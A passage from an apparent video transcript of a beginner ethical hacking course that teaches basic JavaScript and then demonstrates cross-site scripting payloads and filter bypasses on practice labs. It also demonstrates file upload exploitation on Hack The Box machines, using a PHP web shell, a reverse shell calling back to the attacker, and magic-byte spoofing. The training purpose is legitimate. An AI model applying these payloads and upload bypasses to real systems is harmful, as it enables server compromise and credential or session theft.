right here. Yours might not be all in line like this. You can click on the CSS, click on the style page, and then click the pretty right here to make it look pretty. And you can see just like this what they have done. It is organized just like ours. So this would be an anchor tag, which would be clickable, and they have red, green, blue, not sure what the A is, and then they have the text decoration, none. And so you can see their style sheet is called CSS, just like ours, and style.css, and then it is formatted exactly the same way, and this would be an external style sheet. And then if you come back to looking at the elements, you can see the class right here, the class names for how they decided to name their classes and organize what they look like based on the CSS. So now when you come in here and you inspect a page and you come across a CSS file, you'll know what you're looking at, and you'll also be familiar with seeing class inside of the divs, seeing these class names. And that is going to wrap up for us the CSS internal and external. I will see you in the next video. Okay, we're going to be moving into a section on JavaScript. And so as we go through JavaScript, it will be helpful for you to have a great place to practice your JavaScript. And a really easy place to practice JavaScript is within the Chrome developer tools. So I would suggest, if you do not have Chrome installed, go ahead and install Chrome, because we're going to be using it throughout the portion of our JavaScript course. So an easy way to practice JavaScript is just come over to your web app that we have running within Chrome. We can go to inspect, and then we will go to sources. You are going to be on this page right here. We're going to hit these two arrows right here, and we're going to say snippets, and then we'll say new snippet, and then you can just call this index.js, which is the file name within your code that you would have it named over here. And then you can actually just type in your JavaScript right over here, and then when you're done, you can run it just like this by hitting play, and it'll hit up an alert for us. And then if we want to do something like a console.log, and then we want to log something, it will actually pop open the console for us right down here, and it will tell us what we have logged. So this is going to become more familiar with you as we are going along. But this is where we're going to be practicing our JavaScript. And if you're unfamiliar with JavaScript entirely, JavaScript is the scripting language of the internet. So if you are wanting to become a web application penetration tester or a bug bounty hunter, JavaScript is going to be something you're going to want to learn, because it is the language of the internet. It is what gives websites functionality. So when you go to a web application and you see things moving around and stuff happening, that is going to be thanks to JavaScript. So JavaScript is going to be very important for us to learn, and we're going to spend quite a significant amount of time learning this JavaScript. And so buckle up and get ready for JavaScript. One thing that is important to know about JavaScript and really any scripting language is syntax. So you saw me type in alert just like this, and then we can type in the word hello. And then if we close this off, this is not going to work for us. We're actually going to get an error, and if we open up our console, it tells us that we have an error right here. The reason is because these characters within this alert need to be within side quotations, because this is considered a string. So JavaScript wants to interpret whatever's inside of here either as integers, such as 1, 2, 3, and this will run for us and it will work because these are integers, or you're going to need to have strings inside here. So if we type in some characters, we will need them inside of a string. And now if we run this, it will work for us. So we have this alert right here. What is this alert? This alert is calling a function within a JavaScript, and in the future we're going to make our own custom functions. But for now, all you need to know is this alert is this alert is a function, and it is going to pop up the string of characters that are put within here that are being passed within the function. And then I believe we need this within Chrome Developer Tools to close off our alert, and I guess we do not. But typically when you close something off, you will close it off with a semicolon just like this. So it's best practice to go ahead and start putting it in there now as we are practicing. So with that, I will see you in the next lesson. Before we make it too far into our JavaScript lesson, I think it's helpful to know there are several different types of data types, and we've already saw this one right here with a string. But if we pull open the console here, which is really great, it is going to be a very useful tool to us as we're learning our JavaScript. We can type in something called type of, just like this, and then we can put whatever we want inside of our brackets right here, and we can say we want to put in 1 2 3, and it tells us this is a number. And if we put in a string right here like this, we don't even have to type anything in, and it tells us this is a string. And then we also have one other type of data type that will be really helpful to us, especially when we're running while loops, and that is true false, and it will tell us this is a Boolean. So you have strings, integers, and Booleans, and we're going to be using all of these as we move into our JavaScript, and it will be helpful for you to remember these. You're also going to see these within different exploit write-ups within the world of hacking, and so it's important to know that you have integers, strings, and Booleans, because you will come across these in the future. And if you ever do any kind of programming, or you're writing up the code for your own exploits or modifying exploits, you will need to know what is going on and what kind of data types you are dealing with. So with that, there is one more area of JavaScript that I want to cover before we start trying to write any kind of code or do any kind of exercises, and that is variables. So with that, we will check those out in the next video. Okay, so here we are with our variables, and there's a couple different ways I want to show you how to use variables. The very first thing I want to tell you about variables is that it stores some information for you. A variable is going to store some kind of data that we can later come back and say we want this variable, what information is within it, and it will tell us the information that is in it. So for example, if I say var equals 2 plus 3, and then we have to name our variable, and we'll just call it num. So we have this var num equals 2 plus 3. We need to close off our JavaScript here. 2 plus 3. There we go. To get rid of that error. And if we run this, it's going to tell us that we have nothing happening because we need to console log this. So we go console.log, and we're going to log the number. So this is our variable being passed through the console log function. And if we run this, we get the number 5 down here. So this number contains the information 2 plus 3, which is going to be 5, and the console.log just prints the variable down here for us. So we have this right here, and when we run it, we get our number. But how can we take information from the user and use it? There is a function called the prompt, and if you're very familiar with cross-site scripting at this point, then you have for sure seen this in cross-site scripting payloads. Prompt is also another way to view a cross-site scripting instead of an alert. And so you can say prompt, and then we can pass in our information here that we want, and we can say what is your name, question mark, and we can close this off. And if we run this, it should give us this little alert here, and we can say Ryan, okay, and then it prints down here for us. But how do we get this information that we put in here? We need a variable. So if you want, you can go ahead and pause this video and see if you can figure out how to store this prompt in a variable called name, and then get it to console log down here what our name is, or the information that we put into the prompt. And you can go ahead and give this a try now. Okay, this is a pretty simple challenge. All we're going to do is change this to a var name equals what is being put in the prompt, and then if we come down here, we can console.log, and then we'll put up our brackets, and we'll say name, just like this. And now if we run this, we're going to get a prompt, and this time we're going to say Ryan J, okay, and it prints out for us Ryan J down here for us through our console log. I'm actually not entirely sure if it will print anything. If we don't put the console log, it does not. So the console log is necessary to be here for our name to be printed. So we can try this again, and we say name, and it prints name for us. Now there is another way to go about this without the console log, and we could type in like our cross-site scripting that we are familiar with, and we can say hello, and then we can pass in the name function. So we should be able to type in hello plus name, and if we run this and we say Ryan, we get an alert saying hello Ryan. So this is how an alert would work with a console log. The space has to be put right here. That was my problem on why I couldn't get that to space. So we just say like that, hello space and then name. And so now it should alert hello Ryan, just like that. Okay, so you just need this space in here to get the space in the alert. So this is a variable and a prompt. And so I want you to get used to looking at these types of variables and information. So just go ahead and play around and maybe do some simple math, store it in a variable, display it in an alert, maybe do a couple console logs before going on to the next video. So that way you're familiar with variables and how they work.
Okay, so in this video, we're going to cover the while loop, and in the next video, we're going to cover the for loop. And I decided to start with the while loop because it is quite a bit easier to understand. And we're going to just make a simple while loop, and we're going to count to 100. So we can say I equals 0, and then we'll say while I is less than or equal to 100, we want it to do something. And we want to console log I, so we'll go console log, and then we'll say I, so that way it prints the I for us. And the next part is very important. We'll say I plus plus, and this will add 1 to I every time. So the first time it runs, it'll be 0, 1, 2, 3, 4, and so on until it reaches 100, and then it will stop. If you do not have the I++, you'll probably freeze your computer and have to force restart. So this is very important. And so we can go ahead and run this, and it prints out for us that we have all of the numbers here for us, starting with 0. And so this is the while loop. It runs a function or whatever is inside of the while loop until it has reached the total destination. And sometimes you can have a while loop running with taking user input, and when the user input says to quit, you can shut the while loop off. But we're not going to go into that because I don't think it's something you need to know in order to be an ethical hacker. And with that, we will move into the for loop. Okay, so the for loop is going to look a little more daunting and scary, but it really isn't once you understand how for loops work. So if you're coming from another programming languages, for loops are really simple, but in JavaScript, they're a little more difficult because JavaScript is the language of the web. It's not made to run for loops in a simple manner like Python. So if we run a for loop and we're just going to run a simple counter like we just saw, we can say something like for, and it's going to ask us, do we want to run a for loop? And we're going to say yes, and it gives us the boilerplate for a for loop. So we'll just leave this index instead of I, and so we're just going to say that I equals 0, and as long as it is less than 100, we're going to go ahead and say I, or index in this case, plus plus, and then we can just console log this. And then we'll say index just like this. And now if we run this, we're going to get an output down here of counting to a specific number. So in the world of programming, I almost always use for loops. I rarely use while loops, but I just wanted you to see these for loops and while loops so that you can read them when you're looking through JavaScript code for vulnerabilities. In this video, I want to show you a simple way to find cross-site scripting that I have been starting to see pretty regularly within different bug bounty programs. So with that, let's jump into it. So here we are on Code Sandbox, and if you'd like to follow along, you can come to codesandbox.io, and we're going to click create a sandbox. We're going to go with a basic static HTML, and I'm going to show you how this works, even though we're not going to exploit this the same way I did within the CTF or the way you'd find this in the wild. But we have this basic static HTML page right here, and if we click a new window, we can see this right here. And for those of you who know me, you know that I love to view the page source, and this is what we have. It's pretty simple. It's actually everything we have right here, so we don't need to see this. But what I have been noticing on different bug bounty programs, and this is really just lazy developer practice. And so if you're a developer, don't do this. It's really not good practice. So there's often input forms everywhere like this right here. We have this filter, we have this input, and it often gets rendered within the HTML just like this right here. So if we inspect this, you can actually see right here, this is stored inside of a span, and then it has the word filter, which is what we typed right here. And so if we type filter showerhead, it's going to pop up right here. We can inspect it. It'll take us to the spot right here, filter showerhead. So our input actually gets rendered within the HTML, and the same thing happens within Google. You can type in something like this. We have a contactor with a caret, and you can click inspect, and you can see it's right here and it's within these italicized tags. So we have this here. We know that a lot of websites and web applications allow user input. So over here, what happens is when you inspect this for the sake of cross-site scripting, now I'm sure Amazon and I know for sure Google has a lot of filters that you would have to bypass, and it's pretty much nearly impossible to get cross-site scripting to pop on either one of these web applications. But what happens is people come in here and they just take for granted that people don't inspect these elements like this, or they don't view the page source. And let me show you what I have been finding and what I found within this CTF. If we come inside the body tag and we just make a simple div just like this, and then we go to close it off, and then we can type in here, we can type in something like this, but inside this div, what I've been noticing developers do is they'll type in style and then display none, just like this. And so if I save this, you'll notice it doesn't pop up over here, and we still have our div, we still have something. And if we open this up in a new window and we come over here, we view page source, we can see this is actually within the HTML, but it is not displayed because it is hidden. Now, what I have seen is developers doing things like this, rendering whatever you search in here. It is hidden, but it is still here. So what happens is they don't put a bunch of filters within this because no one's going to see it. So this, they don't filter it for cross-site scripting because it doesn't actually render on the page. So what you can do is just put in a simple cross-site scripting payload within a form just like this. And all you have to do is see where it's being stored. So for example, this is being stored within a span. So I'll go ahead and type this out and I'll show you what this looks like. If we were to type something in and then it was just hidden and we didn't know where it was at in the HTML, it would be hard for us to get a cross-site scripting payload to work. But because we'll be able to see that it's inside this span, we can just go ahead and type in cross-site scripting payload and it'll work for us. So I'm going to type this in and then I'll bring you back and show you what it looks like. Okay, so I've typed in our span and we have a class of span. I didn't actually make a CSS for this, so it doesn't really matter. And then I have the word filter, just like we would have over here if we typed in filter and we sent this. And then we inspected our page and we have filter right here. It's basically really similar to this. The only difference is I'm not going to code this up so that we have an input that gets stored in the HTML. We're just going to pretend that we already have an input form and it's just getting stored right here and it's hidden. So since I have saved this, we can close this, close that, and I'll show you it is still not being rendered, but it's within the page source because it is hidden. What we can do is it's really simple to just write in here a script and then pop a cross-site scripting. So what we would do is you would just type in your carets and you can type in script just like this, and then we'll close it off with a script. If I can type just like this, and then all we have to do is type in our alert, and then we can, I guess we're alerting 0. I was going to alert 1, and then you save it and it automatically pops for us, or we can open it in a new window and you can see the cross-site scripting works. What I have been noticing typically is it doesn't get stored just like this right here on Amazon. Where I have been finding this, usually it'll get stored inside of a link or something strange like that. And the cross-site scripting is a little more difficult than just typing in script alert because it's not getting stored within the span. But it really is this simple. The one I found in the wild took like maybe 5 minutes to exploit. But if you look right here, view page source, what we're typing in is getting stored. It's just hidden. So my guess is what developers are doing is just assuming that they don't need to filter inputs that are being hidden that people aren't going to be able to see. So if we get rid of this hidden right here, and then we delete our cross-site scripting just like this, and we type back in something right here and we save this, it renders right here and I have a caret. right there, and it renders for us. And if we open it in a new page, it's right here. So what I've noticed is developers will filter things that are rendering on the page, but they haven't been filtering for cross-site scripting for what has been hidden. So if you're a developer, you should probably go ahead and apply your filters to these hidden inputs, even though they're not rendered on the page. And if you're a bug bounty hunter, this is a really simple way to find a cross-site scripting. Just go to an input form just like this, type in something just like this, hit enter. You can literally come over here, view page source, hit command find, and then type in something and see where it's showing up actually in the HTML. So you can go ahead and test this out yourself and play around with it. Let me know if you have any questions or comments down below.
Okay, one of the most common vulnerabilities is going to be cross-site scripting, or it's also known as XSS, or yeah. And this vulnerability is common, but it's also going to be pretty hard to exploit without knowing some form of HTML and JavaScript. So there are basic payloads that you can go in and you can just test a bunch of them. And I'm going to show you a list that I found. It's got over 6,500 different ways to try and exploit this, but most of the time you're going to have to inspect the page and modify the content. But we'll get to that in just a little bit. I'm going to show you just a couple of cross-site scripting examples here. And then I kind of want to show you the code of what's going on. I think you'll be able to understand it even if you know zero programming. So with that, we'll go ahead and I'll show you an example of what cross-site scripting is, and then I'll explain why it's so dangerous. And so this is going to be the most basic, simple form of cross-site scripting. And so all we want to do is have an alert pop up. And if you can pop up an alert on a bug bounty program, you will be able to submit that for a vulnerability. And there you'll see them a lot of places. A lot of people like to look for them. I don't really look for them all that often because I think most people look for these, and if it's not stored cross-site scripting, then you're not really going to get paid for the amount of time that you put in. You'll get paid, but just not enough for the amount of time it's going to take to find them. So we're going to do this with an image. And image tags will go image source equals, and then we leave it blank. And when this is blank, it's going to make an error on the page. And so on error, we want to alert, which is going to give us the ability to pull off the cross-site scripting. And we're just going to alert 1, and then we will close the tag. And I have made a mistake somewhere. Let's go ahead and delete this equal sign. There it is. So we have the alert pop up and it says localhost 1. Now, what you can do with a cross-site scripting and why it's so dangerous is not because you can just pop things up on somebody's screen, but what you're able to do is you could make this look really fancy, and you could say log into a Wi-Fi or log into this page, or you were accidentally logged out, and people can type in their username and their password, and then all of a sudden you have their credentials. You can put alert document.cookie right here, and then all of a sudden you can steal their session. And so there's quite a few different ways that you can use this to get malicious with it. And so that's why it's so dangerous, but it's also really common. It's going to be in the top 10 vulnerabilities that you're going to find on pretty much any list. And so right here is a different version. So right here is just plain as can be. You can type whatever you want and nothing's going to get blacklisted. So right here, I have made a little, it's really short. It only has the image tag, but you can type your script. The image has been blacklisted. So what I mean by that is if you watch what happens, I finish typing image and it automatically deletes it. This will happen on programs that you're going to test. That they'll have characters that are blacklisted. I have come across it. I come across it regularly. I have come across blacklisted characters when I was trying to do a SQL injection. So you'll come across blacklisted characters. What you'll do is you can go out and you can find encoders and you can encode your payloads in order to fit your specific needs. And in this case, it's pretty simple. All you have to do is go I and make a capital M and a G, and it doesn't get deleted. Or you could go capital I, M, G. And this is a way that you'll find, especially on Capture the Flags, to bypass blacklisted characters or words, is you just change it a little bit, or you can encode it and you can bypass the filter. And so we could do the exact same thing that we had done before. So we'll go on error equal alert, and then we'll just do alert 1, and then we'll close it off. And there's the alert. So all we really had to do was just change the image tag, because the image had been blacklisted, but we were allowed to pull up a different version of the image tag. And so what this looks like, here we have banned characters. So you can have banned characters such as these. People will ban these characters so that you can't inject your code into it. But I will show you. So in this case, I actually ban this character, the backslash. So no matter how many times I push it, it's not going to come in. But you can still ban this. You will find the backslash ban, because if you can't close a tag, then it's going to be really hard to pull off a cross-site scripting. Not impossible, but you can still do it. So what this looks like is I am just replacing the image with an empty string. And over here we have the banned characters. You can see right here, you're not allowed to use those, and I replace them with an empty string. And so this is what a blacklist would look like. You just have a bunch of characters listed that are blacklisted, and you're not allowed to type them in. So when you have a banned backslash, which you're probably only going to see in Capture the Flags, something like this. But what you can do is you can actually make a button tag like this. If I can get that right, there we go. And then you can just type something in here. And then what you can do is you can type in on click equal, and then you do the same thing. You'd put your alert, and we'll put our 1, and we don't have to have a closing tag. We don't have to close that. So we click it, and there's the alert. And you will see this in one of our practice, when we practice the cross-site scriptings. So those are just a few ways you can pull off the cross-site scripting. I want to show you a page that has a ton of cross-site scripting payloads, and here it is. You can actually just Google cross-site scripting payloads, which we'll go ahead and I'll just do it right now and walk you through it. We'll just type in payloads and just click the first one, and here's going to be a list. So you can get an idea of how many are out there and different ways you can do a cross-site scripting. And so this is why I'm telling you there's a lot of different ways to do these. We'll actually see one similar to this in just a few lessons, because we're going to have to close off a tag, and then we're going to have a character blocked, and then we'll actually be able to insert the payload. So there's a ton of different ways to pull these off. It's going to require some knowledge of HTML and JavaScript, Or you can, if you're on a capture the flag, you can just go to burp intruder and you can just send this entire list until you are able to receive a solved challenge. But with that, this is a basic introduction into cross-site scripting, and we'll get a little more hands-on, and I'll have you guys start practicing writing your own payloads in the coming lessons. I'll see you there. Okay, for this challenge, I want you to come to the HackerOne or the Hacker 101 CTF. This is HackerOne's practice site for us to practice what we've learned. And you can come in here to the easy with two flags and click go. If you would like the challenge, we have already saw the XSS in this challenge. I showed it to you in the last lesson. So if you want to go ahead and look for it on your own, you can go ahead and do that. I think you have the knowledge to solve this challenge all on your own without any help, but I will do a walkthrough here in just a second. So if you would like the challenge, you can go ahead and see if you can find the cross-site scripting, and you can do that now. Okay, once we're in here, you can go through, and one of the first things, if you remember from the Recon lesson, is to click through and just open up everything in the page and just see what you can find and what you can do. I actually just thought of another way to try and solve this challenge that I might try and see if it works. And then you can come back and you can go back to the home page, you can create a new page, and you can just click through and see what you can find. But in the markdown, they actually give us a clue as to how to solve this challenge. You have this random button here, it doesn't do anything. But if you edit this page, we have the tag for a button. So if you were unable to find this, you can go ahead and try and solve the challenge now. Because if you remember, if we have a button, we can come in here and we can go on click, and then we can put in our alert, and then we can put in 1. And so we have our on click here, and it's closed off, and we should be able to save this. And on our click, we are given the alert. I just thought of, I bet we could copy this. There's another way you could have solved this. If you didn't see this button here and you didn't have this clue, but you came into the testing and edited and you saw this, you might have thought to go ahead and just insert your own button, and you could have pulled off the same thing just on a different page. And we'll go ahead and change this to just click, just so you can see it's a different button on a different page, and we could have done the same thing. So that is another way that we're able to pull this off. And we're going to see a couple of more examples. And the reason for this is the cross-site scripting is a rabbit hole that you can go down indefinitely. There are thousands and thousands of different ways to pull this off. And so I just want to show you the basic introduction into cross-site scripting, because without knowing HTML and JavaScript, it's going to be kind of challenging to pull these off. And since this is a beginner course, I'm not really expecting any software developers to be in here wondering how to do a cross-site scripting, because if you're a developer, you're going to already know, because you will have had to write code to defend against it. And so with that, I will see you in the next video. Okay, we are going to come back to Port Swigger, and we're just going to do a few of these just so you get an idea of how cross-site scripting works and how people can attack it, and just a little more understanding of seeing these in context of how they relate to pulling off these vulnerabilities, especially to beginners. as you can just copy and paste some of these into search engines and search bars, and you will see them on HackerOne in the Hacktivity, and just so you understand what's going on. So we'll go ahead and open up this first lab here, and we will be told what we are supposed to do. So we're supposed to call the alert function in order to solve the lab. And this one is going to be one of the most basic cross-site scriptings that we're going to see. And one of the common ways to check to see if a website or a web application has any defense against cross-site scripting in a search bar like this. What you can do is you can come in here, and this is basic JavaScript. So we just type in script, and then we type alert 1, and then we close the script tag. So this is just a basic JavaScript command here I can type. And so if this has no sanitization, then this should work. And you can try these in search bars. You can try them and post this script to any kind of social media outlet for the web application and see if it pulls back any cross-site scripting. So we'll go ahead and search this, and it says we have timed out because I opened the lab before I started this video. So we'll go ahead and reopen the lab and let that load. And we'll go ahead, and once this is loaded, I will actually just paste that in. Go ahead and paste that in, and we'll search it. And it pulls back the alert. We were able to alert 1, and it says we have solved this challenge. Now in the next challenge, we are going to go over the DOM cross-site scripting, which I actually think is down here, because this is one that we have seen with the inner HTML, this one right here. So if you would like to go ahead and open this up and give it a try and see if you can get this to pull the alert, we have looked at this payload before. It's not new to you. You will have seen it. You can go ahead and try and find it on your own, and I will see you in the next video. Okay, so how did you get along with that challenge? So we can actually come in here. This is the lab we're going to be working on. We can open it up, and we're going to be setting what we type in to the inner HTML, which means what we are typing in and searching for is going to be saved on the client side, which means it will try and render it. This is what I set up when we looked at the very first examples on the application that I tried to give you examples. If you go back and look at it, this says dangerously set inner HTML, which is just inner HTML with the React framework. And so this is going to be the exact same type of vulnerability that we have already witnessed at the beginning of this section on cross-site scripting. So you can go ahead and open up the lab, and we'll have our search bar, and we're going to be doing essentially the same thing we did in the beginning, where what we type in is going to be rendered on this page. And so we can type in our image, and then we'll do our source, which is where it's going to look for the source. You can actually type anything in here. And so it's going to look for a file saved within this application with this name, and it's not going to find it. And so that's going to cause an error. And what do we want to do? On error, we want to alert, and then here you would put your proof of concept, because we just want to prove that this works. And you can type in XSS, or you can type in 1, or you can type in whatever you want. And we will go ahead and close that off, and we can search this. And there is the alert for us. And so with that, that solves this lab. And we are going to try one more. And I'm going to show you kind of, this is a little more towards the intermediate level of cross-site scripting, but it's just a way for you to know more about cross-site scripting. And if you come across it and you really think there is a cross-site scripting vulnerability in a website, just how you can work through that and maybe do some more research on your own to try and exploit it. So I'll see you in the next video. Okay, this next lab is going to be one that is going to give an example of what it looks like to start looking for cross-site scripting in a little more of an intermediate or advanced way. This is going to be probably the most common way that this is going to be found, because you're going to have to inspect the element and know how to break out of the HTML or the string that you're stuck in order to pull off JavaScript and run it within the application. So we're actually going to go ahead and open up this one right here, and it'll be over here. It'll tell us what we need to do, and we just need to break out of the JavaScript string and call the alert function. So I went ahead and opened this up, and the most common way to do something like this is type in something that you can remember what you typed, or something really easy to find. So we'll type in 1, 2, 3, 4, and we'll hit search. And now what we'll do is inspect the element, or you can view page source. We'll actually do that. That'll be a lot easier to see. So we'll view page source, and then we find our 1, 2, 3, 4, 5, but this is not where we're going to be breaking out of this. See, this is a script tag. The search term right here, we searched for 1, 2, 3, 4, 5, and we have the closing script tag here. So in order to close out of this, we can actually put a script tag up here in our search query, and it will close all this off. This script tag will match this script tag, and then we should be able to open up a new script tag, and it will run in the order. It'll run all of this in the order that it is laid out, and then we should be able to put in our payload. So we'll come back to our lab, and what we should be able to do is close off the previous script tag. So that will close this tag, and everything before it will be inside that tag. And then we should be able to come in here and type in our own payload. And so we'll go script alert, and we will just alert 1, and then we can close off our payload. And look at it, make sure it looks right. And that should work. And then we'll go ahead and search it. And there is the alert, which means we've solved the challenge. And everything after that script tag will get rendered on the page because it doesn't have an opening tag, if you're wondering why this showed up. So we'll go ahead and we'll look at the page source, and I'll show you the difference. See, here is where we closed off that script tag, and then here we put in our payload, and then because this script doesn't have an opening tag, this just gets rendered on the page as plain HTML. So if you are unfamiliar with programming, this probably doesn't make a whole lot of sense to you, but when it comes to cross-site scripting, it's kind of going to be necessary to understand HTML and basic JavaScript in order to pull this off. But the reason I included this in this beginner course is because cross-site scripting is one of the most common vulnerabilities, and so I wanted you to be aware of it, and maybe you can practice it and see if you can get better, or if you want to, before you take the intermediate course, is go learn some basic HTML and some basic JavaScript. It won't take long. You can learn HTML in a week. You can learn CSS which is how to make a website look pretty in a very short amount of time, couple of days, and then you can learn basic JavaScript probably in another week. It doesn't take long. It's pretty simple to learn. And so I wanted to show you cross-site scripting. I want you to be aware of it. Like, look at how many cross-site scripting labs exist on Portswigger, and I think they actually have, yeah, DOM vulnerabilities. So even more cross-site scripting. So there's bunch, a bunch of cross-site scripting. It's really common, but it does take some programming knowledge to solve. And so with that, I will see you in the next video.
All right, in this portion of the course, we're going to be covering file upload. This can be a severe vulnerability, especially if the file is placed somewhere that you can execute what you have uploaded and get back a shell on the server. So file upload is one that you're going to see a lot in CTFs. They do happen in bug bounty programs. You can go and read on the Hacktivity about some file uploads, but in the world of bug bounty hunting, most of the time they're probably not going to lead back to a shell. But in the world of penetration testing and CTFs, or if you're going for any kind of certification to become a penetration tester, then file uploads are always a good place to look, and make sure when you're uploading a file to see if you can bypass any of the filters that may be keeping you from uploading a specific file with a payload inside of it. So with that, let's go ahead and jump into it. To the file upload. So we're going to be going through a few hack the box file uploads, and the reason we're going to be doing hack the box is there really is no great place to practice file upload, and hack the box really has the best systems to practice file upload. If you have a hack the box subscription, then you can open these up, you can play around with them yourself and actually test these out. If not, in the world of bug bounty, if you go to the Hacktivity, you can read about file uploads happening all over the place. So file uploads do happen. We're going to start really basic, and then we're going to have to go through bypassing different filters within the file upload. So this one is really one of the easiest, and if you want to, this box is called October with Hack the Box, and its IP address is right here. And I'm not going to show you how I got to this spot, because really we just want to see the file upload in action and what happens and why this would be a really huge vulnerability in the penetration testing world. So the first thing we're going to do is we can click this file upload, and I tested it. You can upload a file right here. And so what we're going to do is we can just click the file upload button, and I'm going to show you two different ways to go about uploading files and testing this out. So the first is with a web shell. And what we can do is we can come over here like we did before. And what we can do is we can go to Google and just look for web shells, and I can just show you right here. I just typed in web shell, and I scrolled down until I came to the Shushan 747, clicked on it, and we're brought to some PHP web shells. This one right here is one of my favorites. It's the one I use the most. And we can just say that we want to create a gedit, and we'll call it web.cmd. And sometimes you might have to name this like PHP if that's what this server's running in order to get a web shell to run. But we're going to run with CMD, and we'll test this out. We may have to change that to PHP. I'm not really sure. And so we can come back over here. We can upload our web shell just like this. And if we go to the URL, this is a good sign that it didn't give us an error. Now we had to pass in a parameter because we have this right here. It's going to call our web shell when we pass in the parameter CMD. So we can come over here, go question mark, CMD equals, and now we should be able to type in a command here. And if our web shell works, we will receive an output on the page. So we can type in who am I and run it. And this doesn't seem to work. So we will rename this. We'll just go move. So we will type in our web shell, and we will just move it from webcmd to web PHP 5. And the reason I went with PHP 5 is because right here, I should have saw this the first time. It says PHP 5. So we can save this, and now we can upload, and we'll re-upload our web shell just like this. And now we can click on it, click here, move that out of the way. And we can put our parameter in here. So we want a CMD who am I, and now it tells us we are ww data, and you can use this right here to try and get a reverse shell back over here. But I think what we will do is we will just use the pentest monkey PHP reverse shell. So we'll just say PHP reverse shell, and it should be the first one. And so what you can do is go to raw, Command A, Command C. We will come over here and we will just say gedit, and then we'll call it shell.php5. We can paste this in, and then we'll need to change our port because we're listening on port 444. And over here, we are listening on 10. My IP address is 10.10.14.6. We can save this, come back over here. We could probably close that out. We'll upload this file. We want our shell open, and then we click this right here. It hangs, which means we probably have got our callback over here, and we now have a shell on our box. So I want to explain what is happening now that you've seen this. The way a file upload works. If you upload a file, you have to make sure that you know where the actual file is being stored, because when we upload our malicious code, if you can't execute it on the server, it does you no good. So let's say you can upload some kind of shell like this web shell right here or right here, but you can't find the location on the server of this web shell to execute it, it does you no good. So you have to be able to locate it. And for us, this is a really, really simple file upload. You just click here and it takes you to the location right here of where our file is that we uploaded. So this is a really simple file upload, and we have this right here. It tells us it's running PHP. Sometimes it'll just say like we'll have a backend. It'll say something like backend.php like this, and then you'll know it's running PHP. Or if it's Windows, you may try ASPX or ASP. And so you're just going to have to get familiar with the systems you're going up against and what you see on the server that you're attacking. But this is a really basic introduction into a file upload. We're going to do a couple more that are going to be a little more challenging, which is also going to be a lot more realistic. In the real world, the chances you just come across something that just says file upload in a bug bounty is almost zero. Maybe on a penetration test, it might happen, but in the world of bug bounty, probably not going to happen. You're going to have to bypass some sort of filters, and we're going to do some pretty simple filter bypassing in the next file upload. All right, we are here on the box popcorn. Same thing, I'm not going to show you how to get here because we're just covering file upload. And in this one, we're going to talk a little more about bypassing different filters. So if we come in here, we have this edit right here, and it tells us we can update the screenshot, which is going to be this image right here. And it tells us it allows a JPEG or a PNG. And I've never tried JPEG, so we might try that just on the fly and see what happens. But we can save this right here. We can go save image as, and we're in our test file right here, or test directory. So we'll save that. And if we come over here to update the screenshot, we will need to browse, click on our little PNG right here, update it, and submit, and it tells us that it worked. The type was a PNG. And now we should be able to come over to the uploads. We can type in 10, 10, 10, 6, and we'll go /torrent, and then we want the upload just like this. And it tells us here is the image that we just uploaded. So that works. So what we will want to do now is see if we can upload some kind of shell. So we'll just use one of our PHP shells that we already have in this directory. And we'll browse, and we can just try this shell.php5. And if we open this and we submit it, it tells us we have an invalid file. let's come over here and we will move our shell.php5 and we'll just call it shell.php, and we can try this. And it says invalid file. Now what we can try and do is intercept the request and see what the difference is between these. So if we come to update this and we want to update this image again and we upload it, and now we turn our intercept on and we submit this, we can look at the difference, and we'll send this to repeater just to save it. And we know that this is going to go through, tells us that it worked. Now we'll come back and upload our PHP shell and see what the difference is. So we can come over, we'll try our web shell this time and turn on our interceptor, send it, we'll send that to repeater, and we can turn this off now, and we can come over to repeater and look at these and see what the difference is. So when you come over here and you look at this, right here is what we're looking at. So we have a content type of image, PNG, the file name, which was the link that we downloaded, and then it tells us it's a PNG file, and we have all this mumbo jumbo right here. And so what we can do is just copy some of this, and we can copy, and now we can come over here and we have a file type of web.php, and then we have our little web shell that we used before, and we could just paste this in up above. And so our content type has now changed, and we have these bytes to try and confuse it. And then we have this image, or we have our web shell right here. So I want to show you a little bit of how a server would read this file type. If we come in here and we just say gedit and we want to make a we'll make a file.gif and we'll see what happens. And we'll just put in some letters. And we save this, we close it, and we go file, and then we say file.gif. It tells us that it is actually text. So if we then come into our file.gif, there is something called magic bytes that we can add in here to try and trick it. The way a GIF starts is with a GIF 89 or 87A, and if we save something like this and run file on it, now it tells us we have a GIF, an image type, and the version. So this is how a server would read this. If you upload something, it's going to run something like a file on it to see if it really is a GIF or if it just has text in it. And so when we copy all of this right here with the PNG, basically what we're trying to do is trick it by putting something in like this GIF 87A, so that way when it reads it, it will read it as a PNG. And we'll actually try this GIF because I've never actually tried it on this box, so I don't know if it will work or not. And we'll just try the file upload on the fly. So if we send this over, it tells us that it looks like it uploaded. So we can see what it looks like. It did upload. So I'm kind of surprised that worked. We'll go check it out. So if we come over to our uploads, we refresh the page, and we open this up, it looks like it worked. We should be able to pass in our parameter of cmd equals, and we can say who am I, and it tells us right here www data. So that actually worked. I was expecting it to not work, and sometimes when you hit a file like this and it does not work, it might check for just a .png inside the file and then the .php. And if you just go out to Google and you read about different ways to bypass filters for file upload, you're going to have a lot of information, and that's really what I would recommend you to do. This is just the tip of the iceberg on how file upload works. So I'm just showing you some basic ways to bypass it, but I would also recommend going out to Google and reading about how to bypass a PNG file upload filter or a JPEG and see all the different ways you can bypass this. So if we come in here and we send this and it renders, it tells us this worked as well. So we can actually go back, and if we refresh this right here, and it tells us that this worked. So there's one other thing. Let's play around with the JPEG. So if we come in here and we close out of this, let's actually just play with it in repeater and see what happens. So if we say it's an image and we say, actually, let's try the GIF because we already have that set up, and we just leave this like this. and we delete all of this, and we just type in the 87A with GIF at the front. Let's see if this works. It says invalid file. So let's take our PHP shell. We'll copy this, and let's see if we can just say, let's gedit this file, and we'll call it file PHP, and we'll add in the GIF 87A, and then we'll put our PHP in here, and we'll save this. And then we're also going to need our GIF file, so we have that in there too, so that way we can make sure that our content type right here is right. So we'll go to proxy, so that way it is ready. We can try this upload, browse. Let's upload the file with the GIF. We'll open, make sure that we catch this, send it to repeater. It looks like that is how it goes. I actually want to turn this off. It says that it worked. Okay, so it does accept the GIF as well. Now let's upload our reverse shell that we saved in file.php. And we'll send this on over to repeater. See how we have this application type is different. So we can turn this off and see if we can get this to work as well. So we'll send this, and it says invalid file. And when we send this, it says that it worked. So what we can try and do is just grab this like we did before. We'll copy it and paste this in. Should be able to delete this. Does that actually have a semicolon in it? It does, 